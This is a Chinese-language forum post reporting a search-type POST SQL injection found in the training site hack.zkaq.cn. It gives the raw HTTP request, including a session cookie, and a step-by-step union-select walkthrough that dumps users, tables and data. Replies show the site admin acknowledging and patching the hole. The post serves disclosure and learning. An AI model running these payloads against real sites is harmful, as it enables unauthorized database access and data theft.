掌控安全搜索型sql注入

honky   ·   发表于 2021-08-20 11:36:52   ·   漏洞文章

漏洞类型:搜索型POST注入
漏洞链接:https://hack.zkaq.cn/cases#
注入点:lst=
数据包:

  1. POST /api/getCatalog HTTP/1.1
  2. Host: hack.zkaq.cn
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
  4. Accept: application/json, text/javascript, */*; q=0.01
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  8. X-Requested-With: XMLHttpRequest
  9. Content-Length: 26
  10. Origin: https://hack.zkaq.cn
  11. Connection: close
  12. Referer: https://hack.zkaq.cn/cases
  13. Cookie: UM_distinctid=1787ec9d6ce12f-0c0cb7b3626fe08-4c3f237d-144000-1787ec9d6cfb4e; CNZZDATA1274101648=1416450823-1617033020-https%253A%252F%252Fhack.zkaq.cn%252F%7C1629390203; PHPSESSID=u256j9lj6n5996b751mmoq423f
  14. Sec-Fetch-Dest: empty
  15. Sec-Fetch-Mode: cors
  16. Sec-Fetch-Site: same-origin
  17. lst=%25' +--+-

首先判断注入点,在漏洞复现页面的搜索框输入%’ and 1=1 — -页面显示正常,输入%’ and 1=2 — -页面显示未找到数据

使用联合查询注入
先判断字段数%’ order by 6 — -页面返回正常

然后判断显示位%’ union select 11111,22222,33333,44444,55555,66666 — -,得到显示位

然后暴出当前用户和当前数据库%’ union select user(),22222,33333,44444,55555,database() — -


然后暴出当前数据库中所有表,由于这里有长度限制,没办法一下暴出来,需要使用limit分页才能获得剩下的表

limit分页获取剩下的表名,一共有45个表

然后暴字段

然后成功获取数据

用户名金币积分时间理由
honky 0.10 0 2021-09-09 17:05:21 一个受益终生的帖子~~
honky 0.10 0 2021-09-09 17:05:26 一个受益终生的帖子~~
honky 5.00 0 2021-09-09 17:05:27 一个受益终生的帖子~~
奖励系统 50.00 0 2021-09-04 16:04:35 投稿满 5 赞奖励
Track-聂风 4500.00 0 2021-08-24 14:02:14 靶场漏洞特别打赏

打赏我,让我更有动力~

11 条回复   |  直到 2021-12-2 | 3058 次浏览

Track-聂风
发表于 2021-8-24

丢人ing

评论列表

  • 加载数据中...

编写评论内容

Track-聂风
发表于 2021-8-24

SQL注入真的是无处不在,没想到自己的靶场,居然可以用我教你们的第一种攻击手段的方法来攻击

order by 查字段 -> union select 出显示位 -> 系统自带库查表、字段名 -> 出数据 (典型SQL注入,比靶场还简单)

此模块的开发我们已经吊起来打了!!

最后还是感谢同学提交漏洞。其他小伙伴遇到漏洞也可以提交,有奖励哦

评论列表

  • 加载数据中...

编写评论内容

shijie
发表于 2021-8-24

66666666

评论列表

  • 加载数据中...

编写评论内容

2768905967
发表于 2021-8-24

66666

评论列表

  • 加载数据中...

编写评论内容

544730135
发表于 2021-8-24

4500金币啊 发财了

评论列表

  • 加载数据中...

编写评论内容

hu05877
发表于 2021-8-25

佩服佩服

评论列表

  • 加载数据中...

编写评论内容

dark铭
发表于 2021-8-25

66666

评论列表

  • 加载数据中...

编写评论内容

乐伟超
发表于 2021-8-26

评论列表

  • 加载数据中...

编写评论内容

乐伟超
发表于 2021-8-26

这不写个webshell进去,干风哥一炮

评论列表

  • 加载数据中...

编写评论内容

ych0515
发表于 2021-9-10

风哥,一个sql注入是严重漏洞了,4500金币有些少啊,450元。企业src平台都好几千的

评论列表

  • 加载数据中...

编写评论内容

lft130322215
发表于 2021-12-2

这个注入工具是什么

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.